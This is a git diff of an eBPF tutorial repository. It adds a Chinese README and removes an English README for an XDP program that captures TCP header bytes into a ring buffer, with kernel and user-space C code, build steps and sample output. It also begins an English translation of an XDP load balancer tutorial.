It's a powerful technique for network monitoring, security analysis, and debugging. -如果您想了解更多关于 eBPF 的内容,请访问我们的教程代码仓库 或我们的网站 。 +If you would like to learn more about eBPF, visit our tutorial code repository at or our website at . -编程愉快! \ No newline at end of file +Happy coding! diff --git a/src/41-xdp-tcpdump/README.zh.md b/src/41-xdp-tcpdump/README.zh.md new file mode 100644 index 0000000..3a78eae --- /dev/null +++ b/src/41-xdp-tcpdump/README.zh.md @@ -0,0 +1,509 @@ +# eBPF 示例教程:使用 XDP 捕获 TCP 信息 + +扩展伯克利包过滤器(eBPF)是 Linux 内核中的一项革命性技术,允许开发者在内核空间内运行沙箱程序。它提供了强大的网络、安全和跟踪能力,无需修改内核源代码或加载内核模块。本教程重点介绍如何使用 eBPF 结合 Express Data Path(XDP),在数据包进入时的最早阶段直接捕获 TCP 头信息。 + +## 使用 XDP 捕获 TCP 头信息 + +捕获网络数据包对于监控、调试和保护网络通信至关重要。传统工具如 `tcpdump` 在用户空间运行,可能会带来显著的开销。通过利用 eBPF 和 XDP,我们可以在内核中直接捕获 TCP 头信息,最小化开销并提高性能。 + +在本教程中,我们将开发一个 XDP 程序,该程序拦截传入的 TCP 数据包并提取其头信息。我们将这些数据存储在一个环形缓冲区中,用户空间的程序将读取并以可读的格式显示这些信息。 + +### 为什么使用 XDP 进行数据包捕获? + +XDP 是 Linux 内核中一个高性能的数据路径,允许在网络栈的最低层进行可编程的数据包处理。通过将 eBPF 程序附加到 XDP,我们可以在数据包到达时立即处理它们,减少延迟并提高效率。 + +## 内核 eBPF 代码分析 + +让我们深入了解捕获 TCP 头信息的内核空间 eBPF 代码。 + +### 完整的内核代码 + +```c +#include "vmlinux.h" +#include +#include + +#define ETH_P_IP 0x0800 + +// 定义环形缓冲区映射 +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 1 << 24); // 16 MB 缓冲区 +} rb SEC(".maps"); + +// 检查数据包是否为 TCP 的辅助函数 +static bool is_tcp(struct ethhdr *eth, void *data_end) +{ + // 确保以太网头在边界内 + if ((void *)(eth + 1) > data_end) + return false; + + // 仅处理 IPv4 数据包 + if (bpf_ntohs(eth->h_proto) != ETH_P_IP) + return false; + + struct iphdr *ip = (struct iphdr *)(eth + 1); + + // 确保 IP 头在边界内 + if ((void *)(ip + 1) > data_end) + return false; + + // 检查协议是否为 TCP + if (ip->protocol != IPPROTO_TCP) + return false; + + return true; +} + +SEC("xdp") +int xdp_pass(struct xdp_md *ctx) +{ + // 数据包数据指针 + void *data = (void *)(long)ctx->data; + void *data_end = (void *)(long)ctx->data_end; + + // 解析以太网头 + struct ethhdr *eth = data; + + // 检查数据包是否为 TCP 数据包 + if (!is_tcp(eth, data_end)) { + return XDP_PASS; + } + + // 转换为 IP 头 + struct iphdr *ip = (struct iphdr *)(eth + 1); + + // 计算 IP 头长度 + int ip_hdr_len = ip->ihl * 4; + if (ip_hdr_len < sizeof(struct iphdr)) { + return XDP_PASS; + } + + // 确保 IP 头在数据包边界内 + if ((void *)ip + ip_hdr_len > data_end) { + return XDP_PASS; + } + + // 解析 TCP 头 + struct tcphdr *tcp = (struct tcphdr *)((unsigned char *)ip + ip_hdr_len); + + // 确保 TCP 头在数据包边界内 + if ((void *)(tcp + 1) > data_end) { + return XDP_PASS; + } + + // 定义要捕获的 TCP 头字节数 + const int tcp_header_bytes = 32; + + // 确保所需字节数不超过数据包边界 + if ((void *)tcp + tcp_header_bytes > data_end) { + return XDP_PASS; + } + + // 在环形缓冲区中预留空间 + void *ringbuf_space = bpf_ringbuf_reserve(&rb, tcp_header_bytes, 0); + if (!ringbuf_space) { + return XDP_PASS; // 如果预留失败,跳过处理 + } + + // 将 TCP 头字节复制到环形缓冲区 + // 使用循环以确保符合 eBPF 验证器要求 + for (int i = 0; i < tcp_header_bytes; i++) { + unsigned char byte = *((unsigned char *)tcp + i); + ((unsigned char *)ringbuf_space)[i] = byte; + } + + // 将数据提交到环形缓冲区 + bpf_ringbuf_submit(ringbuf_space, 0); + + // 可选:打印调试信息 + bpf_printk("Captured TCP header (%d bytes)", tcp_header_bytes); + + return XDP_PASS; +} + +char __license[] SEC("license") = "GPL"; +``` + +### 代码解释 + +#### 定义环形缓冲区映射 + +我们定义了一个名为 `rb` 的环形缓冲区映射,用于高效地将数据从内核传递到用户空间。 + +```c +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 1 << 24); // 16 MB 缓冲区 +} rb SEC(".maps"); +``` + +#### 数据包解析与验证 + +`is_tcp` 辅助函数通过验证以太网和 IP 头,检查传入的数据包是否为 TCP 数据包。 + +```c +static bool is_tcp(struct ethhdr *eth, void *data_end) +{ + // ...(检查内容略) +} +``` + +#### 捕获 TCP 头信息 
+ +在 `xdp_pass` 函数中,我们: + +1. 解析以太网、IP 和 TCP 头。 +2. 确保所有头信息在数据包边界内,以防止无效内存访问。 +3. 在环形缓冲区中预留空间以存储 TCP 头。 +4. 将 TCP 头字节复制到环形缓冲区。 +5. 提交数据到环形缓冲区,供用户空间使用。 + +```c +// 在环形缓冲区中预留空间 +void *ringbuf_space = bpf_ringbuf_reserve(&rb, tcp_header_bytes, 0); +if (!ringbuf_space) { + return XDP_PASS; +} + +// 复制 TCP 头字节 +for (int i = 0; i < tcp_header_bytes; i++) { + unsigned char byte = *((unsigned char *)tcp + i); + ((unsigned char *)ringbuf_space)[i] = byte; +} + +// 提交到环形缓冲区 +bpf_ringbuf_submit(ringbuf_space, 0); +``` + +#### 使用 bpf_printk 进行调试 + +`bpf_printk` 函数将消息记录到内核的跟踪管道,对于调试非常有用。 + +```c +bpf_printk("Captured TCP header (%d bytes)", tcp_header_bytes); +``` + +## 用户空间代码分析 + +让我们查看用户空间程序,该程序从环形缓冲区中读取捕获的 TCP 头信息并显示。 + +### 完整的用户空间代码 + +```c +#include +#include +#include +#include +#include +#include + +#include +#include + +#include "xdp-tcpdump.skel.h" // 生成的骨架头文件 + +// 处理环形缓冲区事件的回调函数 +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + if (data_sz < 20) { // 最小 TCP 头大小 + fprintf(stderr, "Received incomplete TCP header\n"); + return 0; + } + + // 解析原始 TCP 头字节 + struct tcphdr { + uint16_t source; + uint16_t dest; + uint32_t seq; + uint32_t ack_seq; + uint16_t res1:4, + doff:4, + fin:1, + syn:1, + rst:1, + psh:1, + ack:1, + urg:1, + ece:1, + cwr:1; + uint16_t window; + uint16_t check; + uint16_t urg_ptr; + // 可能还有选项和填充 + } __attribute__((packed)); + + if (data_sz < sizeof(struct tcphdr)) { + fprintf(stderr, "Data size (%zu) less than TCP header size\n", data_sz); + return 0; + } + + struct tcphdr *tcp = (struct tcphdr *)data; + + // 将字段从网络字节序转换为主机字节序 + uint16_t source_port = ntohs(tcp->source); + uint16_t dest_port = ntohs(tcp->dest); + uint32_t seq = ntohl(tcp->seq); + uint32_t ack_seq = ntohl(tcp->ack_seq); + uint16_t window = ntohs(tcp->window); + + // 提取标志位 + uint8_t flags = 0; + flags |= (tcp->fin) ? 0x01 : 0x00; + flags |= (tcp->syn) ? 0x02 : 0x00; + flags |= (tcp->rst) ? 0x04 : 0x00; + flags |= (tcp->psh) ? 0x08 : 0x00; + flags |= (tcp->ack) ? 0x10 : 0x00; + flags |= (tcp->urg) ? 0x20 : 0x00; + flags |= (tcp->ece) ? 0x40 : 0x00; + flags |= (tcp->cwr) ? 
0x80 : 0x00; + + printf("Captured TCP Header:\n"); + printf(" 源端口: %u\n", source_port); + printf(" 目的端口: %u\n", dest_port); + printf(" 序列号: %u\n", seq); + printf(" 确认号: %u\n", ack_seq); + printf(" 数据偏移: %u\n", tcp->doff); + printf(" 标志位: 0x%02x\n", flags); + printf(" 窗口大小: %u\n", window); + printf("\n"); + + return 0; +} + +int main(int argc, char **argv) +{ + struct xdp_tcpdump_bpf *skel; + struct ring_buffer *rb = NULL; + int ifindex; + int err; + + if (argc != 2) + { + fprintf(stderr, "Usage: %s \n", argv[0]); + return 1; + } + + const char *ifname = argv[1]; + ifindex = if_nametoindex(ifname); + if (ifindex == 0) + { + fprintf(stderr, "Invalid interface name %s\n", ifname); + return 1; + } + + /* 打开并加载 BPF 应用 */ + skel = xdp_tcpdump_bpf__open(); + if (!skel) + { + fprintf(stderr, "Failed to open BPF skeleton\n"); + return 1; + } + + /* 加载并验证 BPF 程序 */ + err = xdp_tcpdump_bpf__load(skel); + if (err) + { + fprintf(stderr, "Failed to load and verify BPF skeleton: %d\n", err); + goto cleanup; + } + + /* 附加 XDP 程序 */ + err = xdp_tcpdump_bpf__attach(skel); + if (err) + { + fprintf(stderr, "Failed to attach BPF skeleton: %d\n", err); + goto cleanup; + } + + /* 将 XDP 程序附加到指定的接口 */ + skel->links.xdp_pass = bpf_program__attach_xdp(skel->progs.xdp_pass, ifindex); + if (!skel->links.xdp_pass) + { + err = -errno; + fprintf(stderr, "Failed to attach XDP program: %s\n", strerror(errno)); + goto cleanup; + } + + printf("成功将 XDP 程序附加到接口 %s\n", ifname); + + /* 设置环形缓冲区轮询 */ + rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL); + if (!rb) + { + fprintf(stderr, "Failed to create ring buffer\n"); + err = -1; + goto cleanup; + } + + printf("开始轮询环形缓冲区\n"); + + /* 轮询环形缓冲区 */ + while (1) + { + err = ring_buffer__poll(rb, -1); + if (err == -EINTR) + continue; + if (err < 0) + { + fprintf(stderr, "Error polling ring buffer: %d\n", err); + break; + } + } + +cleanup: + ring_buffer__free(rb); + xdp_tcpdump_bpf__destroy(skel); + return -err; +} +``` + +### 代码解释 + +#### 处理环形缓冲区事件 + +`handle_event` 函数处理从环形缓冲区接收到的 TCP 头数据。 + +```c +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + // 验证数据大小 + if (data_sz < 20) { + fprintf(stderr, "Received incomplete TCP header\n"); + return 0; + } + + // 解析 TCP 头 + // ...(解析代码) +} +``` + +#### 解析 TCP 头 + +我们定义了一个本地的 `tcphdr` 结构来解释原始字节。 + +```c +struct tcphdr { + uint16_t source; + uint16_t dest; + uint32_t seq; + uint32_t ack_seq; + // ...(其他字段) +} __attribute__((packed)); +``` + +#### 显示捕获的信息 + +解析后,我们以可读的格式打印 TCP 头字段。 + +```c +printf("Captured TCP Header:\n"); +printf(" 源端口: %u\n", source_port); +printf(" 目的端口: %u\n", dest_port); +// ...(其他字段) +``` + +#### 设置 eBPF 骨架 + +我们使用生成的骨架 `xdp-tcpdump.skel.h` 来加载和附加 eBPF 程序。 + +```c +/* 打开并加载 BPF 应用 */ +skel = xdp_tcpdump_bpf__open(); +if (!skel) { + fprintf(stderr, "Failed to open BPF skeleton\n"); + return 1; +} + +/* 加载并验证 BPF 程序 */ +err = xdp_tcpdump_bpf__load(skel); +if (err) { + fprintf(stderr, "Failed to load and verify BPF skeleton: %d\n", err); + goto cleanup; +} +``` + +#### 附加到网络接口 + +我们通过接口名称将 XDP 程序附加到指定的网络接口。 + +```c +/* 将 XDP 程序附加到指定的接口 */ +skel->links.xdp_pass = bpf_program__attach_xdp(skel->progs.xdp_pass, ifindex); +if (!skel->links.xdp_pass) { + err = -errno; + fprintf(stderr, "Failed to attach XDP program: %s\n", strerror(errno)); + goto cleanup; +} +``` + +## 编译和执行说明 + +### 前提条件 + +- 支持 eBPF 和 XDP 的 Linux 系统内核。 +- 安装了 libbpf 库。 +- 具有 eBPF 支持的编译器(如 clang)。 + +### 构建程序 + +假设您已从 [GitHub](https://github.com/eunomia-bpf/bpf-developer-tutorial) 克隆了仓库,请导航到 
`bpf-developer-tutorial/src/41-xdp-tcpdump` 目录。 + +```bash +cd bpf-developer-tutorial/src/41-xdp-tcpdump +make +``` + +此命令将编译内核 eBPF 代码和用户空间应用程序。 + +### 运行程序 + +首先,识别您的网络接口: + +```bash +ifconfig +``` + +示例输出: + +``` +wlp0s20f3: flags=4163 mtu 1500 + inet 192.168.1.10 netmask 255.255.255.0 broadcast 192.168.1.255 + ether 00:1a:2b:3c:4d:5e txqueuelen 1000 (Ethernet) +``` + +使用所需的网络接口运行用户空间程序: + +```bash +sudo ./xdp-tcpdump wlp0s20f3 +``` + +示例输出: + +``` +成功将 XDP 程序附加到接口 wlp0s20f3 +开始轮询环形缓冲区 +Captured TCP Header: + 源端口: 443 + 目的端口: 53500 + 序列号: 572012449 + 确认号: 380198588 + 数据偏移: 8 + 标志位: 0x10 + 窗口大小: 16380 +``` + +### 完整的源代码和资源 + +- **源代码仓库:** [GitHub - bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) +- **教程网站:** [eunomia.dev Tutorials](https://eunomia.dev/tutorials/) + +## 总结与结论 + +在本教程中,我们探讨了如何使用 eBPF 和 XDP 在 Linux 内核中直接捕获 TCP 头信息。通过分析内核 eBPF 代码和用户空间应用程序,我们学习了如何拦截数据包、提取关键的 TCP 字段,并使用环形缓冲区高效地将这些数据传递到用户空间。 + +这种方法为传统的数据包捕获方法提供了一种高性能的替代方案,对系统资源的影响最小。它是网络监控、安全分析和调试的强大技术。 + +如果您想了解更多关于 eBPF 的内容,请访问我们的教程代码仓库 或我们的网站 。 + +编程愉快! \ No newline at end of file diff --git a/src/41-xdp-tcpdump/README_en.md b/src/41-xdp-tcpdump/README_en.md deleted file mode 100644 index b9a0764..0000000 --- a/src/41-xdp-tcpdump/README_en.md +++ /dev/null @@ -1,508 +0,0 @@ -# eBPF Tutorial by Example: Capturing TCP Information with XDP - -Extended Berkeley Packet Filter (eBPF) is a revolutionary technology in the Linux kernel that allows developers to run sandboxed programs within the kernel space. It enables powerful networking, security, and tracing capabilities without the need to modify the kernel source code or load kernel modules. This tutorial focuses on using eBPF with the Express Data Path (XDP) to capture TCP header information directly from network packets at the earliest point of ingress. - -## Capturing TCP Headers with XDP - -Capturing network packets is essential for monitoring, debugging, and securing network communications. Traditional tools like `tcpdump` operate in user space and can incur significant overhead. By leveraging eBPF and XDP, we can capture TCP header information directly within the kernel, minimizing overhead and improving performance. - -In this tutorial, we'll develop an XDP program that intercepts incoming TCP packets and extracts their header information. We'll store this data in a ring buffer, which a user-space program will read and display in a human-readable format. - -### Why Use XDP for Packet Capturing? - -XDP is a high-performance data path within the Linux kernel that allows for programmable packet processing at the lowest level of the network stack. By attaching an eBPF program to XDP, we can process packets immediately as they arrive, reducing latency and improving efficiency. - -## Kernel eBPF Code Analysis - -Let's dive into the kernel-space eBPF code that captures TCP header information. 
-
-### Full Kernel Code
-
-```c
-#include "vmlinux.h"
-#include <bpf/bpf_helpers.h>
-#include <bpf/bpf_endian.h>
-
-#define ETH_P_IP 0x0800
-
-// Define the ring buffer map
-struct {
-    __uint(type, BPF_MAP_TYPE_RINGBUF);
-    __uint(max_entries, 1 << 24); // 16 MB buffer
-} rb SEC(".maps");
-
-// Helper function to check if the packet is TCP
-static bool is_tcp(struct ethhdr *eth, void *data_end)
-{
-    // Ensure Ethernet header is within bounds
-    if ((void *)(eth + 1) > data_end)
-        return false;
-
-    // Only handle IPv4 packets
-    if (bpf_ntohs(eth->h_proto) != ETH_P_IP)
-        return false;
-
-    struct iphdr *ip = (struct iphdr *)(eth + 1);
-
-    // Ensure IP header is within bounds
-    if ((void *)(ip + 1) > data_end)
-        return false;
-
-    // Check if the protocol is TCP
-    if (ip->protocol != IPPROTO_TCP)
-        return false;
-
-    return true;
-}
-
-SEC("xdp")
-int xdp_pass(struct xdp_md *ctx)
-{
-    // Pointers to packet data
-    void *data = (void *)(long)ctx->data;
-    void *data_end = (void *)(long)ctx->data_end;
-
-    // Parse Ethernet header
-    struct ethhdr *eth = data;
-
-    // Check if the packet is a TCP packet
-    if (!is_tcp(eth, data_end)) {
-        return XDP_PASS;
-    }
-
-    // Cast to IP header
-    struct iphdr *ip = (struct iphdr *)(eth + 1);
-
-    // Calculate IP header length
-    int ip_hdr_len = ip->ihl * 4;
-    if (ip_hdr_len < sizeof(struct iphdr)) {
-        return XDP_PASS;
-    }
-
-    // Ensure IP header is within packet bounds
-    if ((void *)ip + ip_hdr_len > data_end) {
-        return XDP_PASS;
-    }
-
-    // Parse TCP header
-    struct tcphdr *tcp = (struct tcphdr *)((unsigned char *)ip + ip_hdr_len);
-
-    // Ensure TCP header is within packet bounds
-    if ((void *)(tcp + 1) > data_end) {
-        return XDP_PASS;
-    }
-
-    // Define the number of bytes you want to capture from the TCP header
-    const int tcp_header_bytes = 32;
-
-    // Ensure that the desired number of bytes does not exceed packet bounds
-    if ((void *)tcp + tcp_header_bytes > data_end) {
-        return XDP_PASS;
-    }
-
-    // Reserve space in the ring buffer
-    void *ringbuf_space = bpf_ringbuf_reserve(&rb, tcp_header_bytes, 0);
-    if (!ringbuf_space) {
-        return XDP_PASS; // If reservation fails, skip processing
-    }
-
-    // Copy the TCP header bytes into the ring buffer
-    // Using a loop to ensure compliance with eBPF verifier
-    for (int i = 0; i < tcp_header_bytes; i++) {
-        unsigned char byte = *((unsigned char *)tcp + i);
-        ((unsigned char *)ringbuf_space)[i] = byte;
-    }
-
-    // Submit the data to the ring buffer
-    bpf_ringbuf_submit(ringbuf_space, 0);
-
-    // Optional: Print a debug message
-    bpf_printk("Captured TCP header (%d bytes)", tcp_header_bytes);
-
-    return XDP_PASS;
-}
-
-char __license[] SEC("license") = "GPL";
-```
-
-### Code Explanation
-
-#### Defining the Ring Buffer Map
-
-We define a ring buffer map named `rb` to pass data from the kernel to user space efficiently.
-
-```c
-struct {
-    __uint(type, BPF_MAP_TYPE_RINGBUF);
-    __uint(max_entries, 1 << 24); // 16 MB buffer
-} rb SEC(".maps");
-```
-
-#### Packet Parsing and Validation
-
-The `is_tcp` helper function checks whether the incoming packet is a TCP packet by verifying the Ethernet and IP headers.
-
-```c
-static bool is_tcp(struct ethhdr *eth, void *data_end)
-{
-    // ... (checks omitted for brevity)
-}
-```
-
-#### Capturing TCP Header Information
-
-In the `xdp_pass` function, we:
-
-1. Parse the Ethernet, IP, and TCP headers.
-2. Ensure all headers are within the packet bounds to prevent invalid memory access.
-3. Reserve space in the ring buffer to store the TCP header.
-4. Copy the TCP header bytes into the ring buffer.
-5. Submit the data to the ring buffer for user-space consumption.
-
-```c
-// Reserve space in the ring buffer
-void *ringbuf_space = bpf_ringbuf_reserve(&rb, tcp_header_bytes, 0);
-if (!ringbuf_space) {
-    return XDP_PASS;
-}
-
-// Copy the TCP header bytes
-for (int i = 0; i < tcp_header_bytes; i++) {
-    unsigned char byte = *((unsigned char *)tcp + i);
-    ((unsigned char *)ringbuf_space)[i] = byte;
-}
-
-// Submit to ring buffer
-bpf_ringbuf_submit(ringbuf_space, 0);
-```
-
-#### Using bpf_printk for Debugging
-
-The `bpf_printk` function logs messages to the kernel's trace pipe, which can be invaluable for debugging.
-
-```c
-bpf_printk("Captured TCP header (%d bytes)", tcp_header_bytes);
-```
-
-## User-Space Code Analysis
-
-Let's examine the user-space program that reads the captured TCP headers from the ring buffer and displays them.
-
-### Full User-Space Code
-
-```c
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <errno.h>
-#include <stdint.h>
-#include <arpa/inet.h>
-
-#include <net/if.h>
-#include <bpf/libbpf.h>
-
-#include "xdp-tcpdump.skel.h" // Generated skeleton header
-
-// Callback function to handle events from the ring buffer
-static int handle_event(void *ctx, void *data, size_t data_sz)
-{
-    if (data_sz < 20) { // Minimum TCP header size
-        fprintf(stderr, "Received incomplete TCP header\n");
-        return 0;
-    }
-
-    // Parse the raw TCP header bytes
-    struct tcphdr {
-        uint16_t source;
-        uint16_t dest;
-        uint32_t seq;
-        uint32_t ack_seq;
-        uint16_t res1:4,
-                 doff:4,
-                 fin:1,
-                 syn:1,
-                 rst:1,
-                 psh:1,
-                 ack:1,
-                 urg:1,
-                 ece:1,
-                 cwr:1;
-        uint16_t window;
-        uint16_t check;
-        uint16_t urg_ptr;
-        // Options and padding may follow
-    } __attribute__((packed));
-
-    if (data_sz < sizeof(struct tcphdr)) {
-        fprintf(stderr, "Data size (%zu) less than TCP header size\n", data_sz);
-        return 0;
-    }
-
-    struct tcphdr *tcp = (struct tcphdr *)data;
-
-    // Convert fields from network byte order to host byte order
-    uint16_t source_port = ntohs(tcp->source);
-    uint16_t dest_port = ntohs(tcp->dest);
-    uint32_t seq = ntohl(tcp->seq);
-    uint32_t ack_seq = ntohl(tcp->ack_seq);
-    uint16_t window = ntohs(tcp->window);
-
-    // Extract flags
-    uint8_t flags = 0;
-    flags |= (tcp->fin) ? 0x01 : 0x00;
-    flags |= (tcp->syn) ? 0x02 : 0x00;
-    flags |= (tcp->rst) ? 0x04 : 0x00;
-    flags |= (tcp->psh) ? 0x08 : 0x00;
-    flags |= (tcp->ack) ? 0x10 : 0x00;
-    flags |= (tcp->urg) ? 0x20 : 0x00;
-    flags |= (tcp->ece) ? 0x40 : 0x00;
-    flags |= (tcp->cwr) ?
0x80 : 0x00; - - printf("Captured TCP Header:\n"); - printf(" Source Port: %u\n", source_port); - printf(" Destination Port: %u\n", dest_port); - printf(" Sequence Number: %u\n", seq); - printf(" Acknowledgment Number: %u\n", ack_seq); - printf(" Data Offset: %u\n", tcp->doff); - printf(" Flags: 0x%02x\n", flags); - printf(" Window Size: %u\n", window); - printf("\n"); - - return 0; -} - -int main(int argc, char **argv) -{ - struct xdp_tcpdump_bpf *skel; - struct ring_buffer *rb = NULL; - int ifindex; - int err; - - if (argc != 2) - { - fprintf(stderr, "Usage: %s \n", argv[0]); - return 1; - } - - const char *ifname = argv[1]; - ifindex = if_nametoindex(ifname); - if (ifindex == 0) - { - fprintf(stderr, "Invalid interface name %s\n", ifname); - return 1; - } - - /* Open and load BPF application */ - skel = xdp_tcpdump_bpf__open(); - if (!skel) - { - fprintf(stderr, "Failed to open BPF skeleton\n"); - return 1; - } - - /* Load & verify BPF programs */ - err = xdp_tcpdump_bpf__load(skel); - if (err) - { - fprintf(stderr, "Failed to load and verify BPF skeleton: %d\n", err); - goto cleanup; - } - - /* Attach XDP program */ - err = xdp_tcpdump_bpf__attach(skel); - if (err) - { - fprintf(stderr, "Failed to attach BPF skeleton: %d\n", err); - goto cleanup; - } - - /* Attach the XDP program to the specified interface */ - skel->links.xdp_pass = bpf_program__attach_xdp(skel->progs.xdp_pass, ifindex); - if (!skel->links.xdp_pass) - { - err = -errno; - fprintf(stderr, "Failed to attach XDP program: %s\n", strerror(errno)); - goto cleanup; - } - - printf("Successfully attached XDP program to interface %s\n", ifname); - - /* Set up ring buffer polling */ - rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL); - if (!rb) - { - fprintf(stderr, "Failed to create ring buffer\n"); - err = -1; - goto cleanup; - } - - printf("Start polling ring buffer\n"); - - /* Poll the ring buffer */ - while (1) - { - err = ring_buffer__poll(rb, -1); - if (err == -EINTR) - continue; - if (err < 0) - { - fprintf(stderr, "Error polling ring buffer: %d\n", err); - break; - } - } - -cleanup: - ring_buffer__free(rb); - xdp_tcpdump_bpf__destroy(skel); - return -err; -} -``` - -### Code Explanation - -#### Handling Ring Buffer Events - -The `handle_event` function processes TCP header data received from the ring buffer. - -```c -static int handle_event(void *ctx, void *data, size_t data_sz) -{ - // Validate data size - if (data_sz < 20) { - fprintf(stderr, "Received incomplete TCP header\n"); - return 0; - } - - // Parse the TCP header - // ... (parsing code) -} -``` - -#### Parsing the TCP Header - -We define a local `tcphdr` structure to interpret the raw bytes. - -```c -struct tcphdr { - uint16_t source; - uint16_t dest; - uint32_t seq; - uint32_t ack_seq; - // ... (other fields) -} __attribute__((packed)); -``` - -#### Displaying Captured Information - -After parsing, we print the TCP header fields in a readable format. - -```c -printf("Captured TCP Header:\n"); -printf(" Source Port: %u\n", source_port); -printf(" Destination Port: %u\n", dest_port); -// ... (other fields) -``` - -#### Setting Up the eBPF Skeleton - -We use the generated skeleton `xdp-tcpdump.skel.h` to load and attach the eBPF program. 
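-
-The skeleton header itself is generated from the compiled BPF object at build time. Assuming the object file is named `xdp-tcpdump.bpf.o` (the tutorial's Makefile may use different names), the generating step is a sketch like:
-
-```sh
-bpftool gen skeleton xdp-tcpdump.bpf.o > xdp-tcpdump.skel.h
-```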
- -```c -/* Open and load BPF application */ -skel = xdp_tcpdump_bpf__open(); -if (!skel) { - fprintf(stderr, "Failed to open BPF skeleton\n"); - return 1; -} - -/* Load & verify BPF programs */ -err = xdp_tcpdump_bpf__load(skel); -if (err) { - fprintf(stderr, "Failed to load and verify BPF skeleton: %d\n", err); - goto cleanup; -} -``` - -#### Attaching to the Network Interface - -We attach the XDP program to the specified network interface by name. - -```c -skel->links.xdp_pass = bpf_program__attach_xdp(skel->progs.xdp_pass, ifindex); -if (!skel->links.xdp_pass) { - err = -errno; - fprintf(stderr, "Failed to attach XDP program: %s\n", strerror(errno)); - goto cleanup; -} -``` - -## Compilation and Execution Instructions - -### Prerequisites - -- A Linux system with a kernel version that supports eBPF and XDP. -- libbpf library installed. -- Compiler with eBPF support (clang). - -### Building the Program - -Assuming you have cloned the repository from [GitHub](https://github.com/eunomia-bpf/bpf-developer-tutorial), navigate to the `bpf-developer-tutorial/src/41-xdp-tcpdump` directory. - -```bash -cd bpf-developer-tutorial/src/41-xdp-tcpdump -make -``` - -This command compiles both the kernel eBPF code and the user-space application. - -### Running the Program - -First, identify your network interfaces: - -```bash -ifconfig -``` - -Sample output: - -``` -wlp0s20f3: flags=4163 mtu 1500 - inet 192.168.1.10 netmask 255.255.255.0 broadcast 192.168.1.255 - ether 00:1a:2b:3c:4d:5e txqueuelen 1000 (Ethernet) -``` - -Run the user-space program with the desired network interface: - -```bash -sudo ./xdp-tcpdump wlp0s20f3 -``` - -Sample output: - -``` -Successfully attached XDP program to interface wlp0s20f3 -Start polling ring buffer -Captured TCP Header: - Source Port: 443 - Destination Port: 53500 - Sequence Number: 572012449 - Acknowledgment Number: 380198588 - Data Offset: 8 - Flags: 0x10 - Window Size: 16380 -``` - -### Complete Source Code and Resources - -- **Source Code Repository:** [GitHub - bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) -- **Tutorial Website:** [eunomia.dev Tutorials](https://eunomia.dev/tutorials/) - -## Summary and Conclusion - -In this tutorial, we explored how to use eBPF and XDP to capture TCP header information directly within the Linux kernel. By analyzing both the kernel eBPF code and the user-space application, we learned how to intercept packets, extract essential TCP fields, and communicate this data to user space efficiently using a ring buffer. - -This approach offers a high-performance alternative to traditional packet capturing methods, with minimal impact on system resources. It's a powerful technique for network monitoring, security analysis, and debugging. - -If you would like to learn more about eBPF, visit our tutorial code repository at or our website at . - -Happy coding! diff --git a/src/42-xdp-loadbalancer/README.md b/src/42-xdp-loadbalancer/README.md index 06fc527..c792e8f 100644 --- a/src/42-xdp-loadbalancer/README.md +++ b/src/42-xdp-loadbalancer/README.md @@ -1,44 +1,45 @@ -# eBPF 开发者教程: 简单的 XDP 负载均衡器 -在本教程中,我们将指导您如何使用eBPF(扩展的Berkeley Packet Filter)实现一个简单的XDP(eXpress Data Path)负载均衡器。只需使用C语言和libbpf库,无需外部依赖,这是一个适合开发者的实践指南,帮助您充分利用Linux内核的强大功能来构建高效的网络应用程序。 +# eBPF Developer Tutorial: XDP Load Balancer -## 为什么选择XDP? +In this tutorial, we will guide you through the process of implementing a simple XDP (eXpress Data Path) load balancer using eBPF (Extended Berkeley Packet Filter). 
With just C, libbpf, and no external dependencies, this hands-on guide is perfect for developers interested in harnessing the full power of the Linux kernel to build highly efficient network applications. -`XDP`(eXpress Data Path)是Linux中的一个高速、内核级网络框架,它允许在网络堆栈的最早阶段,即在网络接口卡(NIC)上处理数据包。这使得XDP可以进行超低延迟和高吞吐量的数据包处理,非常适合用于负载均衡、DDoS保护和流量过滤等任务。 +## Why XDP? -XDP的关键特性: +`XDP` (eXpress Data Path) is a fast, in-kernel networking framework in Linux that allows packet processing at the earliest point in the network stack, right in the network interface card (NIC). This enables ultra-low-latency and high-throughput packet handling, making XDP ideal for tasks like load balancing, DDoS protection, and traffic filtering. -1. **快速数据包处理**:XDP直接在网络接口卡(NIC)级别处理数据包,减少了延迟,并通过避免通常的网络堆栈开销来提高性能。 -2. **高效**:由于在数据包进入内核之前处理它们,XDP最大限度地减少了CPU使用率,能够在高流量负载下保持系统的快速响应。 -3. **可定制的eBPF**:XDP程序使用eBPF编写,允许您为特定的用例创建自定义的数据包处理逻辑,例如丢弃、重定向或转发数据包。 -4. **低CPU开销**:支持零拷贝数据包转发,XDP占用更少的系统资源,非常适合在最少CPU负载的情况下处理高流量。 -5. **简单操作**:XDP程序返回预定义的操作,例如丢弃、通过或重定向数据包,提供对流量处理的控制。 +Key Features of XDP -### 使用XDP的项目 +1. **Fast Packet Processing**: XDP handles packets directly at the NIC level, reducing latency and improving performance by avoiding the usual networking stack overhead. +2. **Efficient**: Because it processes packets before they reach the kernel, XDP minimizes CPU usage and handles high traffic loads without slowing down the system. +3. **Customizable with eBPF**: XDP programs are written using eBPF, allowing you to create custom packet-handling logic for specific use cases like dropping, redirecting, or forwarding packets. +4. **Low CPU Overhead**: With support for zero-copy packet forwarding, XDP uses fewer system resources, making it perfect for handling high traffic with minimal CPU load. +5. **Simple Actions**: XDP programs return predefined actions like dropping, passing, or redirecting packets, providing control over how traffic is handled. -- `Cilium` 是一个为云原生环境(如Kubernetes)设计的开源网络工具。它使用XDP高效处理数据包过滤和负载均衡,提升了高流量网络中的性能。 -- `Katran` 由Facebook开发,是一个负载均衡器,它使用XDP处理数百万的连接,且CPU使用率低。它高效地将流量分发到服务器,在Facebook内部被用于大规模的网络环境。 -- `Cloudflare` 使用XDP来防御DDoS攻击。通过在NIC级别过滤恶意流量,Cloudflare可以在攻击数据包进入内核之前将其丢弃,最大限度地减少对网络的影响。 +Projects That Use XDP -### 